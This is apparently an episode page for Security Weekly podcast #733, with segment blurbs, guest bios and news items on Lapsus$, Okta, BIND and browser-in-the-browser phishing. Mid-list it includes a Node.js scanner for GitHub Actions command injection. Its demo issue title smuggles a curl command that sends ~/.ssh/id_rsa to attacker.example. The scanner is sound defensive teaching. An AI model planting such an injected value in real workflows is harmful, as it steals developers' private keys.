
PSW #733 – Stephen Ward & David Kennedy

This week, we start the show off with an interview featuring Stephen Ward, the CMO of Source Defense, about Exposing the Shadows: Managing Shadow Code and the Blind Side in 3rd Party Risk! Next up, we jump into the Security News for this week: insiders inside NASA, BIND is in a bind again, Lapsus$ is on a tear, ripping at Microsoft and Okta, Anonymous hacks printers, the UEFI security rabbit hole goes DEEP, MikroTik and TrickBot, Browser-in-the-Browser attacks, Nestle gets attacked for not wanting to hurt babies, & just another sabotage! Finally, a pre-recorded interview featuring Dave Kennedy, where we discuss TrevorC2!

Segment Resources:

Our core whitepaper

https://info.sourcedefense.com/event/client-side-white-paper-2022?leadsource=White%20Paper

Blog on the blind side topic

https://sourcedefense.com/resources/blog/wheres-the-blind-side-in-your-3rd-party-risk-its-on-the-client-side/

Free risk report on attendee's web properties

https://sourcedefense.com/check-your-exposure/

This segment is sponsored by Source Defense.

Visit https://securityweekly.com/sourcedefense to learn more about them!



Segments

1. Managing Shadow Code & the Blind Side in 3rd Party Risk – Stephen Ward – PSW #733

With all of your focus and investment on third-party risk management, there is likely still a blind side that remains unaddressed. It should move to the top of your priority list, both for its potential to cause material losses in the form of response costs, fines and judgements, and for the ease with which it can be mitigated. It is a risk introduced by the third-party vendors you rely on (and the nth parties they work with) to power and enhance your website. The threat of JavaScript-based attacks (clickjacking, digital skimming, formjacking, defacement, "Magecart") exists for any organization collecting sensitive data or conducting transactions through its web properties. Attacks of this type have damaged some of the biggest brands in the world, costing household names like British Airways tens of millions, and they happen by the hundreds per month. Already in 2022, we've seen headlines of major client-side attacks like the one that hit Segway, potentially impacting nearly a million consumers.

This is an area of exposure introduced through your own code and through your partners' code, and it can only be addressed on the client side, in the browser where that code actually runs. It remains widely unaddressed because website security to this point has focused on the server side.

Join us for an exploration of the threat of these attacks, real-world examples of the material impact they have caused, and dialogue on the approaches to mitigating this risk with pros and cons of each.



Guest

Stephen Ward, CMO at Source Defense

Stephen Ward is CMO at Source Defense, the pioneer in client-side security. He has been with the firm since late 2021 and is responsible for all aspects of go-to-market. Stephen is a serial cybersecurity entrepreneur with a 25-year career in marketing. In his career, he has been fortunate enough to work for some of the most innovative, category-creating companies in our space. He helped bring forensics to the forefront in his time at NetWitness, helped drive change in endpoint security while at Invincea, brought threat intelligence to the mainstream while at iSight Partners, drove real change in OT/ICS security while at Claroty, and helped create the cyber risk quantification market while at RiskLens and through his work with the FAIR Institute. Don't hold his title against him: he's more than a marketing person, and he has been dedicated to driving better outcomes for the good guys in cybersecurity for the majority of his career.

Hosts

Paul Asadoorian, Founder at Security Weekly
Josh Marpet, Executive Director at RM-ISAO

2. Baby Food, Lapsus$, Anonymous Vs. Printers, UEFI Rabbit Holes, & Browser-In-Browser – PSW #733

In the Security News: insiders inside NASA, BIND is in a bind again, Lapsus$ is on a tear, ripping at Microsoft and Okta, Anonymous hacks printers, the UEFI security rabbit hole goes DEEP, MikroTik and TrickBot, Browser-in-the-Browser attacks, Nestle gets attacked for not wanting to hurt babies, just another sabotage, & more!


Hosts

Paul Asadoorian, Founder at Security Weekly
  1. How We Discovered Vulnerabilities in CI/CD Pipelines of Popular Open-Source Projects – Cycode - Command injection for GitHub Actions, yikes
  2. Why We Haven't Seen Debilitating Cyberwar in Ukraine - meh, lots of speculation: "One was that Russian hackers are not nimble enough to compromise Ukrainian targets during the invasion; a second was that stealthy cyberattacks aren't that useful when compared to the damage that Russian troops are doing with missiles and bombs; and thirdly that Russian hackers are too busy protecting their own digital infrastructure."
  3. High-Severity Vulnerabilities Patched in BIND Server - Looks like DoS-resulting vulnerabilities, though still could be useful to take out strategic DNS servers, if that's your thing.
  4. Anonymous hacks unsecured printers to send anti-war messages across Russia - I still can't understand why people make printers available on the Internet: "The printers were misconfigured, and manually forwarded on the Russian routers. In every case we have reviewed, the port was deliberately forwarded."
  5. Over 200,000 MicroTik Routers Worldwide Are Under the Control of Botnet Malware - Crazy: "The disclosure also coincides with a new report from Microsoft, which revealed how the TrickBot malware has weaponized MikroTik routers as proxies for command-and-control communications with the remote servers, raising the possibility that the operators may have used the same botnet-as-a-service." Also, links to this in the article: https://eclypsium.com/2021/12/09/when-honey-bees-become-murder-hornets/
  6. Exploring a New Class of Kernel Exploit Primitive – Microsoft Security Response Center
  7. High-Severity UEFI Vulnerabilities Patched in Dell Enterprise Laptops - Yea: "These also prove that the majority of enterprise tools available for source code analysis are not suitable for pinpointing firmware-specific security defects. There are multiple reasons, one of the most obvious being the differences in implementations of the memory management functions compared to the non-firmware-specific software. This leads to a false sense of security when no vulnerabilities are detected at source code level." And yep: "Unfortunately, most outsourcing companies developing firmware code for major device vendors do not have product security teams or sometimes even a single employee dedicated to mitigating security risks" - So many examples too, like vendors going to market with a 7-year-old Linux kernel and binaries.... Better article too: https://binarly.io/posts/AMI_UsbRt_Repeatable_Failures_A_6_year_old_attack_vector_still_affecting_millions_of_enterprise_devices And also, these are like 6-year-old vulnerabilities: "Totally I discovered three 0day vulnerabilities in NvmeSmm, SdioSmm and UsbRt drivers from AMI and one in ItkSmmVars driver from Intel. Vulnerabilities were reported to Intel at 15.07.2016 and after several working days both Intel and AMI confirmed all of the security issues. Intel decided to release a single advisory INTEL-SA-00057 to cover all four vulnerabilities:" (Ref: https://github.com/Cr4sh/Aptiocalypsis)
  8. New Browser-in-the-Browser (BITB) Attack Makes Phishing Nearly Undetectable - "Fortunately for us, replicating the entire window design using basic HTML/CSS is quite simple. Combine the window design with an iframe pointing to the malicious server hosting the phishing page, and it's basically indistinguishable. The image below shows the fake window compared with the real window. Very few people would notice the slight differences between the two." Ref: https://mrd0x.com/browser-in-the-browser-phishing-attack/ - Also, I believe the pop-up window uses an image to fake the URL bar, which is an awesome trick (though I did not dig through the source to check if this is actually what it's doing). UPDATE: Okay I looked at the source and yes, this is what it's doing :)
  9. Okta investigating claims of customer data breach from Lapsus$ group - Uh Oh: "Okta confirmed today they suffered a security incident in January when hackers compromised a laptop of one of its support engineers that could initiate password resets for customers. An investigation into the breach showed that the threat actors had access to the laptop for five days, during which they were able to access Okta's customer support panel and the company's Slack server." - What could you get from Slack and the support channel? https://www.bleepingcomputer.com/news/security/okta-confirms-25-percent-customers-impacted-by-hack-in-january/
  10. Information About HubSpot's March 18, 2022 Security Incident
  11. Lapsus$ hackers leak 37GB of Microsoft's alleged source code - Source code may not be my target at MS, backdoors in the update servers would be my personal favorite: "In a new blog post published tonight, Microsoft has confirmed that one of their employee's accounts was compromised by Lapsus$, providing limited access to source code repositories." Ref: https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-they-were-hacked-by-lapsus-extortion-group/
  12. Anonymous released 10GB database of Nestlé - This is where the wild west approach gets messy: "Anonymous has called for a total boycott of Nestle products after the Swiss food conglomerate continued to supply essential goods to Russia despite mounting pressure from competitors to cut ties. In response to intense public pressure to cut ties with Russia in protest of its military assault on Ukraine, more than 400 multinational corporations have either partially or completely exited the country. Nestlé announced earlier this month that it would suspend all exports of its products from Russia except for essential items such as baby formula." - I mean, yea, baby formula.
  13. OffSecOps: Using Jenkins For Red Team Tooling – HTTP418 InfoSec
  14. Open Source Maintainer Sabotages Code to [NOT] Wipe Russian, Belarusian Computers - "RIAEvangelist told Motherboard in an email that "There was no actual code to wipe computers. It only puts a file on the desktop." He then pointed to a Twitter account he said belonged to him and which had now been targeted by hackers."
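The GitHub Actions command injection in item 1 of the list above comes from expanding an attacker-controlled `${{ ... }}` expression (an issue or PR title, a branch name, a commit message) inside a `run:` script: the runner substitutes the text before the shell parses the line, so the attacker's own quotes and semicolons become shell syntax. As an added example, not the show's or Cycode's code, the Node.js script below scans a workflow for that pattern and shows the substitution the runner performs. The workflow text, the malicious issue title and the host attacker.example are constructed for the example; the list of untrusted contexts is a starting point, not a complete one.

```javascript
// Added example, not from the show or from Cycode: a minimal scanner for GitHub
// Actions expression injection in `run:` steps, plus the substitution that makes
// it exploitable. Node.js, no dependencies. The workflow text is constructed.

// Contexts an outside contributor controls. Any of these expanded inside a shell
// script is an injection. Starting list only; extend for your own triggers.
const UNTRUSTED_CONTEXTS = [
  /\bgithub\.event\.issue\.(title|body)\b/,
  /\bgithub\.event\.pull_request\.(title|body)\b/,
  /\bgithub\.event\.pull_request\.head\.(ref|label|repo\.default_branch)\b/,
  /\bgithub\.event\.(comment|review|review_comment)\.body\b/,
  /\bgithub\.event\.pages\.[^.\s]+\.page_name\b/,
  /\bgithub\.event\.(head_commit|commits\.[^.\s]+)\.(message|author\.(name|email))\b/,
  /\bgithub\.head_ref\b/,
];
const EXPRESSION = /\$\{\{\s*([^}]*?)\s*\}\}/g;

function isUntrusted(expr) {
  return UNTRUSTED_CONTEXTS.some((re) => re.test(expr));
}

// Collect every `run:` script as [{ line, text }], handling inline values and
// YAML block scalars (`run: |`). Line numbers are 1-based into the workflow.
function runScripts(yamlText) {
  const lines = yamlText.split('\n');
  const scripts = [];
  for (let i = 0; i < lines.length; i++) {
    const m = /^(\s*(?:-\s+)?)run:\s*(.*)$/.exec(lines[i]);
    if (!m) continue;
    const keyCol = m[1].length;
    const value = m[2].trim();
    if (/^[|>][-+]?\d*$/.test(value)) {
      // block scalar: every following line indented deeper than the `run` key
      const body = [];
      let j = i + 1;
      for (; j < lines.length; j++) {
        const indent = lines[j].length - lines[j].trimStart().length;
        if (lines[j].trim() !== '' && indent <= keyCol) break;
        body.push({ line: j + 1, text: lines[j] });
      }
      scripts.push(body);
      i = j - 1;
    } else {
      scripts.push([{ line: i + 1, text: value }]);
    }
  }
  return scripts;
}

// Report each untrusted expression that lands inside a run script.
function findInjections(yamlText) {
  const findings = [];
  for (const script of runScripts(yamlText)) {
    for (const { line, text } of script) {
      for (const m of text.matchAll(EXPRESSION)) {
        if (isUntrusted(m[1])) findings.push({ line, expression: m[1] });
      }
    }
  }
  return findings;
}

// What the runner does with a run step: plain text substitution of every
// expression before the shell ever sees the line. Quoting in the script cannot
// help, because the attacker's value arrives carrying its own quotes.
function renderRunStep(script, contexts) {
  return script.replace(EXPRESSION, (_, expr) => {
    const value = expr.split('.').reduce((o, k) => (o == null ? undefined : o[k]), contexts);
    return value == null ? '' : String(value);
  });
}

// Constructed workflow: one vulnerable step, one hardened via env, one benign.
const SAMPLE_WORKFLOW = [
  'name: triage',
  'on:',
  '  issues:',
  '    types: [opened]',
  'jobs:',
  '  triage:',
  '    runs-on: ubuntu-latest',
  '    steps:',
  '      - name: vulnerable',
  '        run: |',
  '          echo "New issue: ${{ github.event.issue.title }}"',
  '          ./scripts/label.sh "${{ github.event.issue.title }}"',
  '      - name: hardened',
  '        env:',
  '          TITLE: ${{ github.event.issue.title }}',
  '        run: echo "New issue: $TITLE"',
  '      - name: fine',
  '        run: echo "Run ${{ github.run_id }} on ${{ github.repository }}"',
].join('\n');

// Constructed issue title; attacker.example is a placeholder host.
const MALICIOUS_TITLE = 'Bug report"; curl -d @$HOME/.ssh/id_rsa https://attacker.example/ #';

console.log(findInjections(SAMPLE_WORKFLOW));
console.log(renderRunStep('echo "New issue: ${{ github.event.issue.title }}"',
  { github: { event: { issue: { title: MALICIOUS_TITLE } } } }));
```

The hardened step shows the fix: pass the value through `env:` and reference it as `"$TITLE"` in the script, so the shell receives it as data rather than as part of the command text. The scanner flags only `run:` scripts; the same expansion inside an `env:` value is safe because the runner sets the variable without re-parsing it.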
Josh Marpet, Executive Director at RM-ISAO
Lee Neely, Information Assurance APL at Lawrence Livermore National Laboratory
  1. Most NASA Systems at Risk From Insider Threats: Audit - NASA's Inspector General has concluded an audit of the agency's information technology systems that found its classified platform has effective insider threat countermeasures. However, the agency's unclassified systems (which do contain sensitive information) possess substantial insider threat risks and require attention.
  2. Emotet malware campaign impersonates the IRS for 2022 tax season - The Emotet malware crew reared its head in 2014 and has become the world's most feared financial crime-oriented hacking group. They are ramping up their malware campaign as America's tax season escalates. Their phishing emails emulate something that would be sent from the Internal Revenue Service, with malicious file attachments that the reader is urged to immediately open.
  3. Exotic Lily initial access broker works with Conti gang - Researchers say they have linked the new initial access broker "Exotic Lily," which provides access to previously compromised entities, to operations being conducted by the "Conti" ransomware group. Exotic Lily is currently exploiting the Microsoft Windows MSHTML vulnerability (CVE-2021-40444) in phishing campaigns that have distributed more than 5,000 phishing emails per day targeting some 650 organizations from around the world.
  4. FBI: Avoslocker ransomware targets US critical infrastructure - The FBI, U.S. Treasury Department, and the Financial Crimes Enforcement Network (FinCEN) have issued a TLP:WHITE joint security advisory warning that the "AvosLocker" ransomware-as-a-service (RaaS) is being actively used in attacks targeting various U.S. critical infrastructure sectors.
  5. High-Severity Vulnerabilities Patched in BIND Server - The Internet Systems Consortium (ISC) has released security updates to address three high-severity flaws (CVE-2022-0635, CVE-2022-0667, CVE-2021-25220) affecting the Berkeley Internet Name Domain (BIND) server software.
  6. Anonymous leaked data stolen from Russian pipeline company Transneft - Anonymous hacked Omega Company, the in-house R&D unit of Transneft, the Russian oil pipeline giant, and leaked stolen data. The Anonymous collective claims it has 79GB of stolen emails, and leaked those emails on the "Distributed Denial of Secrets" whistleblower site.
  7. White House issues call to action in light of new intelligence on Russian cyberthreat - The Biden administration once again urged private sector firms to address known vulnerabilities and harden their cyber defenses given the increased possibility of Russian cyber attacks targeting U.S. critical infrastructure.
  8. Microsoft investigating claims of hacked source code repositories - Microsoft has revealed it is now investigating claims from the "Lapsus$" data extortion gang that it breached Microsoft's internal Azure DevOps source code repositories on March 20 and stole data.
  9. Okta investigating claims of customer data breach from Lapsus$ group - According to Lapsus$, it was able to steal "superuser/admin" access to Okta.com, which allowed it to access the customer data. Per CEO Todd McKinnon, "In late January 2022, Okta detected an attempt to compromise the account of a third party customer support engineer working for one of our subprocessors. The matter was investigated and contained by the subprocessor. We believe the screenshots shared online are connected to this January event. Based on our investigation to date, there is no evidence of ongoing malicious activity beyond the activity detected in January."

3. TrevorC2 – David Kennedy – PSW #733

Check out our latest interview with our good friend Dave Kennedy! When not pumping iron, Dave is hard at work understanding and implementing C2 infrastructure. TrevorC2 is a really cool framework that allows for some pretty stealthy C2 communications. Tune in to learn more!


Guest

David Kennedy, CEO at TrustedSec

David Kennedy is founder of Binary Defense and TrustedSec. Both organizations focus on the betterment of the security industry. David also served on the board of directors of (ISC)². David was formerly the CSO for Diebold Incorporated, where he ran the entire INFOSEC program. David is a co-author of the book "Metasploit: The Penetration Tester's Guide", and the creator of the Social-Engineer Toolkit (SET), Artillery, Unicorn, PenTesters Framework, and several other popular open source tools. David has been interviewed by several news organizations including CNN, Fox News, MSNBC, CNBC, Katie Couric, and BBC World News. David is the co-host of the Social-Engineer Podcast and appears on several additional podcasts. David has testified in front of Congress on two occasions on the security around government websites. David is one of the founding authors of the Penetration Testing Execution Standard (PTES), a framework designed to fix the penetration testing industry. David was the co-founder of DerbyCon, a large-scale conference started in Louisville, Kentucky. Prior to the private sector, David worked for the United States Marine Corps and deployed to Iraq twice for intelligence-related missions.

Hosts

Paul Asadoorian, Founder at Security Weekly
Josh Marpet, Executive Director at RM-ISAO